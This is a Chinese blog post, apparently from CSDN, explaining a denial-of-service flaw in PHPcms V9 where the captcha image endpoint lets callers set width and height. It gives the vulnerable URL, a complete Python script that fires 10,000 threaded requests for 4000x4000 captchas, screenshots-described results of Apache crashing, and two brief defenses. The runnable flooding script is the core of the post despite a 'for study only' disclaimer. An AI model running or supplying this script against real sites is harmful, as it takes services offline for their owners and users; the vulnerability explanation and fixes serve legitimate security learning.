Web安全(图片验证码大小可控导致ddos)

最新推荐文章于 2024-08-13 10:56:47 发布
最新推荐文章于 2024-08-13 10:56:47 发布
阅读量3.4k 收藏 19
点赞数 11
分类专栏: 实战集 Web安全进阶课程笔记 文章标签: 图片验证码 DDoS攻击 PHPcms 多线程 服务器防御
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42383069/article/details/119025358
版权

图片验证码大小可控导致ddos

一. 前言:
在网站登录处,通常会有图片验证码.我们知道,Web漏洞的成因都有一个很重要的共同点,那就是外部可控.
比如Sql注入中的Url,用户输入的地方可能会存在XSS等.那么如果图片验证码可控,会发生什么呢?
二 . 原理:
比如一个生成图片验证码的链接如下:

http://xx.xx.xx.xx/DEV_GBK_1.4.0/gbk/install_package/api.php?op=checkcode&code_len=4&font_size=20&width=130&height=50&font_color=&background=

这里我们注意两个参数:width和height,这两个意思字面理解为长度和宽度,那么我们尝试修改它的大小:

在这里插入图片描述
可以看到,修改大小后图片也随之改变.那么如果我们在这里找到一个临界值(能显示图片的最大长度和宽度),然后利用多线程一直去访问这个链接,是不是会造成服务端不断去处理这个请求(比预期的数据包大很多),可能会导致服务端压力过大,造成ddos攻击.

三. 实战

  1. 这里我们使用PHPcms_V9来测试: 首先搭建好环境,来到管理员登录页:

在这里插入图片描述2. 可以看到图片验证码,然后F12找到生成验证码的链接,如下:

http://xx.xx.xx/DEV_GBK_1.4.0/gbk/install_package/api.php?op=checkcode&code_len=4&font_size=20&width=500&height=500&font_color=&background=

然后尝试修改width和height,找到最大值且保证可访问.这里我找到的大概是 width=4000&height=4000
然后就可以利用脚本使用多线程去访问了

四. Python测试脚本

import requests
import threading
import time

"""
    @ 图片验证码大小可控导致ddos攻击脚本
    @ 单线程为测试,可忽略
    @ 使用时修改url即可
    @ 可根据实际情况修改访问次数,默认为10000
    @ 仅供学习参考,请勿实施攻击
    
"""

# 访问指定Url
def requser():
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
    }
    # 将图片的长宽设置为最大临界值的链接
    url = "http://xx.xx.xx.xx/DEV_GBK_1.4.0/gbk/install_package/api.php?op=checkcode&code_len=4&font_size=20&width=4000&height=4000&font_color=&background="
    # url = "https://www.baidu.com/"
    req = requests.get(url=url,headers=headers)
    print("resuest Success!")

# 单线程访问
def single_thread():
    for i in range(50):
        requser()
        print(f"现在是第{i}次请求网页")

# 多线程访问
def multi_thread():
    print("multi_thread begin")
    threads = []
    for i in range(10000): # 10000为访问次数,可根据实际调整
        threads.append(
            threading.Thread(target=requser)
        )
    print(threads)
    for thread in threads:
        thread.start()

    for thread in threads:
        thread.join()
    print("multi_thread end")

if __name__ == '__main__':
    # 单线程
    # single_thread()
    # 多线程
    start = time.time()
    multi_thread()
    end = time.time()
    t = end - start
    print(f"multi thread cost:{t} s")

五. 测试结果:

  1. 这里我们开启脚本去攻击,自己的服务器比较差,跑了100来次就挂了,看以下效果,已经刷不出来了:
    在这里插入图片描述
  2. 看看服务器:Apache已经挂了
    在这里插入图片描述
    六 . 防御
    这个就老生常谈了:
    (1) 指定图片验证码的大小,不让外部用户控制大小参数
    (2) 发现脚本请求直接封IP
Beyond My
关注
专栏目录
浅析图形验证码安全
2301_77157449的博客
05-11 845
验证码的定义:验证码(CAPTCHA)是“Completely Automated Public Turing test to tell Computers and Humans Apart”(全自动区分计算机和人类的图灵测试)的缩写,是一种区分用户是计算机还是人的公共全自动程序。可以防止:恶意破解密码、刷票、论坛灌水,有效防止某个黑客对某一个特定注册用户用特定程序暴力破解方式进行不断的登陆尝试,实际上用验证码是现在很多网站通行的方式,我们利用比较简易的方式实现了这个功能。
一张验证码引发对DOS的思考
DYBOY-程序开发&网络安全
08-15 1484
DDOS攻击在互联网上是比较常见的一种攻击方式。 他的目的就是为了让攻击目标网站或者在线服务失去相应,或者因为大量流量和IP一时间如洪水般涌入服务器,导致服务器拒绝服务,甚至宕机。 在《白帽子讲WEB安全》笔记一文中,我有写到各类常见 DDOS 攻击,以及简单的防御方式。 本次实验主要是在某次挖洞的过程,以及正好看到黑家小无常刚发布的文章给我的启示,然后顺便做了一下验证。 0x...
验证码大小可控导致的拒绝服务攻击漏洞
weixin_50464560的博客
11-03 676
黑家小无常诚殷网络黑无常是也,专业反诈,信安培训!前言这个漏洞是我在挖掘某工信部下面的某个众测平台,发现他们的验证码参数大小可控,在那一晚突然而来的灵感,目前大多数CMS的漏洞和SRC,都已经刷完了才公开的,所以不会对市面上大型企业造成影响,针对大型企业比较好的服务器,还是需要上千个才能解决。1. 这个漏洞不能帮你获取到敏感信息2.这个漏洞不能帮你获取到shell3.这个漏洞没有啥利用条件利用过程今天这里以PHPcms为例子,讲解一下。首先我们来到PHPCMS的第一步会员登录页面:http://192.16
dos攻击漏洞思路小结
最新发布
2401_83799022的博客
08-13 738
测试拒绝服务漏洞时一定不要一下子将参数调得很大,有的系统比较脆弱,可能会将服务器打崩,而src中明确规定不允许对业务产生影响,若打崩服务器会造成不可预知的后果,需谨慎对待。解压zbxl.zip炸弹以后会出现16个压缩包,每个压缩包又包含16个,如此循环5次,最后得到16的5次方个文件,也就是1048576个文件,这一百多万个最终文件,每个大小为4.3GB。测试了很久没找到漏洞,然后借朋友手机登录我的账户(账户是登录状态),换个手机登录时不小心输错了密码,然后点击登录后发现原本手机登录态的账户被强制退出了。
渗透测试验证码参数可控造成的 DDOS 攻击漏洞
Adminxe的博客
05-04 1626
0x00 准备 环境:VMware IP:192.168.1.6 系统:windows 2008 R2 WEB:PHPCMS V9.63 工具:Burp Suite 0x01 复现 1、部署网站准备 将 PHPCMS 安装包解压到 phpstudy 的网站根目录下。 访问站点 ip:192.168.1.6,安装 phpcms。 进入后台。 生成首页。完成部署。 2、利...
php自定义验证码图片大小且可点击图片刷新验证码
weixin_30565327的博客
09-29 283
<?php class ValidateCode{ public $charset="abcdefghjkmnpqrstwxyzABCDEFGHJKLMNPQRSTWXYZ23456789"; public $codelength=9;//验证码长度 public $code;//验证码 public $img;//画布 public $width; pu...
图片验证码
GoldenFish的专栏
05-03 712
思路:图片验证码的实现主要的技术点是如何生成一个图片。生成图片可以使用java.awt包下的类来实现。我们先写一个简单的生成图片的程序HelloImage.java。以下是代码部分。   package com.vogoal.test;import java.awt.Color;import java.awt.Graphics;import java.awt.image.Buffe
javaWeb实现图片验证码功能
weixin_45943192的博客
10-21 869
java程序实现画图 public static void main(String[] args)throws Exception { String message="3456789abcdefghjkmnpqstuvwxy"; //通过java生成图片 //现实:画画 //1 准备画板- //2 铺上画布 //3 准备笔 //4 画背景 //5 画主题 //6 撤画布 //1 在内存中开辟空间 用于画画 BufferedImage bin=new Buffe
web安全服务渗透测试模板
yjwangan的博客
11-21 1166
一到渗透测试报告就头疼?一份渗透测试报告模板,远离报告烦恼
Web安全防御策略:安全认证和授权控制
本章将介绍Web安全的重要性、常见的安全威胁以及安全认证和授权控制在Web安全中的作用。让我们深入了解Web安全的全貌。 ## 1.1 Web安全的重要性 在当今数字化信息时代,Web已经成为人们获取信息、进行交流、进行...
Web安全期末复习
kaisaooo的博客
07-02 6358
目录前言知识点Web应用开发基础Web信息收集Web漏洞扫描SQL注入文件上传攻击跨站脚本攻击(XSS)跨站请求伪造命令执行漏洞Web Server配置安全认证和授权日志系统构建及日志分析实战与综合简答题复习要点ASP.NET的安全控件web应用系统的数据加密数据库安全通信身份验证日志分析安全配置一套习题 前言 本文用来记录Web安全的复习资料,大部分内容都是从老师ppt的复习范围中节选的,可能不太全,经过考试的心得:有时间的可以多看看,考的比较杂啥都有,但是SQL注入、XSS、文件上传漏洞是重中之重。有
web安全攻防渗透测试实战指南
jhf223344的博客
04-05 9031
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
DDOS学习+网络钓鱼+验证码攻击
weixin_55648772的博客
12-20 3296
Dos攻击 Dos(Denial of service)即拒绝服务。Dos攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地将攻击对象资源耗尽。
登录页面可能产生哪些漏洞?
2201_75341517的博客
06-06 460
面试这个经常会被问到,给你一个登录页面,你觉得可能存在哪些漏洞?
安全-DDOS介绍及攻击防御原理说明
wangtd的博客
05-22 4702
DDoS攻击(Distributed Denial-of-Service attack)是指利用多台主机对目标服务器发起大量的请求,从而使其无法处理正常的网络流量并导致服务不可用。这些请求通常是恶意的、占用大量带宽的和重复的,导致服务器在瞬间被过载,无法响应真正的客户端请求。DDoS攻击可以通过各种手段进行,如利用僵尸网络、利用漏洞发起攻击或伪造IP地址等。它不仅给网站运营者和用户带来影响,而且可能会导致公司损失巨额资金。 DDOS攻击包括不限于上述的攻击类型。近几年,DDoS攻击的规模、频率和影响
验证码渗透最全总结
zkaqlaoniao的博客
12-06 411
验证码分为两块内容,一块是图形验证码,一块是短信验证码。下面是对这些技巧总结的思维导图。
验证码及登录中的漏洞分析
KHOST的博客
06-02 3309
进行这个整理,是因为在XXX项目的时候,发现登录模块的忘记密码功能,在验证用户身份的时候是通过手机验证码验证的。通过修改响应包的返回参数值,可以绕过验证,进入第三步的密码重置。还有最近测试的一个sso登录,也存在验证码问题。 之前的测试中也遇到过类似的验证码绕过的漏洞,所以对验证码绕过方法进行一个总结,以及关于登录模块可能会存在的逻辑漏洞进行一个小整理。 其实,会出现验证码的地方,也就是校验用...
记一次验证码漏洞挖掘及验证码漏洞原理和危害
weixin_63560942的博客
03-17 1374
验证码是我们生活中经常遇到的东西我们注册账号,需要手机验证码,提交留言等需要图形验证码,那么我们就这两类生活中最常见的验证码进行讨论,看看有什么方法可以绕过验证码验证。验证码漏洞有一定危害,恶意攻击者可以用这个漏洞登录他人账号,获得用户权限,再用逻辑越权或者sql注入等手段获得该网站高权限进行恶意攻击,也可以将他人账户的各种资产搞得一团糟。希望大家学习后不用用于不法用途,共同维护网络安全
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值